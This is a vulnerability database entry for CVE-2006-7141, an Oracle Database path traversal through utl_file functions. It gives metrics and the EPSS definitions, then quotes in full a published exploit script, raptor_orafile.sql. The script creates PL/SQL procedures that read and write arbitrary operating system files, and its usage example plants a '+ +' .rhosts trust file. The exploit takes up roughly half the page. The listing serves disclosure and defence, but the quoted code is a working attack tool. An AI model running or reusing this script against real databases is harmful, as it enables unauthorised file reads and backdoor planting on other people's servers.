CVE-2006-7141 : Detail

CVE-2006-7141

0.56%V3
Network
2007-03-07
19h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Absolute path traversal vulnerability in Oracle Database Server, when utl_file_dir is set to a wildcard value or "CREATE ANY DIRECTORY to PUBLIC" privileges exist, allows remote authenticated users to read and modify arbitrary files via full filepaths to utl_file functions such as (1) utl_file.put_line and (2) utl_file.get_line, a related issue to CVE-2005-0701. NOTE: this issue is disputed by third parties who state that this is due to an insecure configuration instead of an inherent vulnerability

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6 AV:N/AC:M/Au:S/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2959

Publication date : 2006-12-18 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

-- -- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptor_orafile.sql - file system access suite for oracle -- Copyright (c) 2006 Marco Ivaldi <[email protected]> -- -- This is an example file system access suite for Oracle based on the utl_file -- package (http://www.adp-gmbh.ch/ora/plsql/utl_file.html). Use it to remotely -- read/write OS files with the privileges of the RDBMS user, without the need -- for any special privileges (CONNECT and RESOURCE roles are more than enough). -- -- The database _must_ be configured with a non-NULL utl_file_dir value -- (preferably '*'). Check it using the following query: -- SQL> select name, value from v$parameter where name = 'utl_file_dir'; -- -- If you have the required privileges (ALTER SYSTEM) and feel brave -- enough to perform a DBMS shutdown/startup, you can consider modifying -- this parameter yourself, using the following PL/SQL: -- SQL> alter system set utl_file_dir='*' scope =spfile; -- -- See also: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql -- -- Usage example: -- $ sqlplus scott/tiger -- [...] -- SQL> @raptor_orafile.sql -- [...] -- SQL> exec utlwritefile('/tmp', 'mytest', '# this is a fake .rhosts file'); -- SQL> exec utlwritefile('/tmp', 'mytest', '+ +'); -- SQL> set serveroutput on; -- SQL> exec utlreadfile('/tmp', 'mytest'); -- # this is a fake .rhosts file -- + + -- End of file. -- -- file reading module -- -- usage: set serveroutput on; -- exec utlreadfile('/dir', 'file'); create or replace procedure utlreadfile(p_directory in varchar2, p_filename in varchar2) as buffer varchar2(260); fd utl_file.file_type; begin fd := utl_file.fopen(p_directory, p_filename, 'r'); dbms_output.enable(1000000); loop utl_file.get_line(fd, buffer, 254); dbms_output.put_line(buffer); end loop; exception when no_data_found then dbms_output.put_line('End of file.'); if (utl_file.is_open(fd) = true) then utl_file.fclose(fd); end if; when others then if (utl_file.is_open(fd) = true) then utl_file.fclose(fd); end if; end; / -- file writing module -- -- usage: exec utlwritefile('/dir', 'file', 'line to append'); create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as fd utl_file.file_type; begin fd := utl_file.fopen(p_directory, p_filename, 'a'); -- append utl_file.put_line(fd, p_line); if (utl_file.is_open(fd) = true) then utl_file.fclose(fd); end if; end; / -- milw0rm.com [2006-12-19]

Products Mentioned

Configuraton 0

Oracle>>Database_server >> Version *

References